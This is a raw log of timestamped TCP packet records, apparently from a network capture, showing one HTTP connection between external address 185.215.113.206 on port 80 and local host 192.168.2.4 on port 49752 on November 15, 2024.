Nov 15, 2024 14:09:27.595786095 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.595801115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.595817089 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.595819950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.595833063 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.595864058 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.596574068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.596597910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.596606970 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.596615076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.596622944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.596630096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.596649885 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.596676111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.597589016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.597605944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.597620010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.597644091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.597676992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.597695112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.598550081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.598567009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.598583937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.598602057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.598603010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.598620892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.598634958 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.598649025 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.699594975 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.699676991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.699915886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.699945927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.699968100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.700001001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.700303078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.700321913 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.700339079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.700355053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.700361013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.700414896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.701004982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.701023102 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.701039076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.701055050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.701071978 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.701081991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.701097965 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.701117992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.702229977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.702248096 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.702264071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.702280998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.702303886 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.702328920 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.703233957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.703252077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.703269005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.703285933 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.703300953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.703321934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.703342915 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.703351974 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.704468012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.704485893 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.704499960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.704515934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.704529047 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.704530001 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.704547882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.704550982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.704582930 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.704593897 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.705503941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.705521107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.705535889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.705550909 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.705565929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.705585957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.705615044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.706162930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.706190109 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.706202984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.706218004 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.706234932 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.706248999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.706249952 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.706268072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.706269026 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.706284046 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.706307888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.707300901 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707335949 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707350969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707366943 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707382917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707396030 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.707412004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.707444906 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.707746029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707763910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707779884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707797050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707802057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.707811117 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707827091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.707840919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.707851887 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.707884073 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.708617926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.708635092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.708651066 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.708667994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.708682060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.708683014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.708703995 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.708733082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.709285021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.709302902 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.709319115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.709327936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.709368944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.709387064 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.710002899 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710021019 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710035086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710051060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710072041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.710078955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710115910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.710134983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.710910082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710927963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710942984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710973024 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.710988998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.710988998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.711004019 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.711020947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.711035013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.711926937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.711945057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.711961031 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.711977959 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.711980104 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.712004900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.712034941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.712589979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.712608099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.712621927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.712635994 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.712636948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.712651014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.712656021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.712670088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.712672949 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.712685108 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.712707996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.713321924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.713340044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.713355064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.713371038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.713385105 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.713387012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.713418007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.713438034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.713941097 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.713987112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.714061975 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.714080095 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.714096069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.714112997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.714118958 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.714138985 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.714164019 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.722841978 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.722862005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.722877979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.722894907 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.722908020 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.722923994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.722925901 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.722949028 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.722961903 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.723324060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.723342896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.723357916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.723373890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.723388910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.723397017 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.723412037 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.723424911 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.724920988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.724939108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.724953890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.724971056 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.724986076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.724997044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.725003958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.725019932 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.725019932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.725040913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.725065947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.728872061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.728890896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.728909016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.728919029 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.728935957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.728944063 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.730149031 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.730166912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.730182886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.730217934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.730217934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.730217934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.730469942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.730489969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.730504990 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.730521917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.730530977 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.730549097 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.730566025 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.731435061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.731451988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.731467962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.731511116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.732825994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.732844114 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.732861042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.732877016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.732897997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.732923985 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.733104944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.733122110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.733139038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.733160973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.733164072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.733177900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.733201981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.733972073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.734019041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.734039068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.734055996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.734072924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.734097004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.734922886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.734955072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.734965086 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.734972000 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.735013008 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.736593962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.736613035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.736629009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.736644983 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.736659050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.736675978 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.736991882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.737010002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.737025976 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.737032890 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.737042904 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.737065077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.737067938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.737107038 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.738282919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.738291979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.738298893 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.738306046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.738339901 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.738357067 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.740540028 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.740557909 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.740575075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.740590096 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.740606070 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.740632057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.740632057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.740632057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.740654945 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.741209984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741229057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741244078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741260052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741286039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.741302013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.741923094 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741941929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741957903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741965055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.741974115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741990089 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.741997957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.742013931 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.742033005 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.743365049 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.743383884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.743400097 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.743416071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.743433952 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.743439913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.743462086 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.743485928 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.757883072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.757936001 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.757949114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.757975101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.758008003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.758011103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.758044958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.758093119 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.758568048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.758622885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.758660078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.758670092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.758697987 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.758735895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.758744001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.759264946 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.824603081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.824651003 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.824688911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.824727058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.824743986 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.824781895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.824923992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.824960947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.824995041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.825046062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.825057983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.826071024 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.826127052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.826128006 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.826167107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.826203108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.826211929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.826236010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.826272011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.826282978 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.826622963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.826659918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.826668024 CET	49752	80	192.168.2.4	185.215.113.206
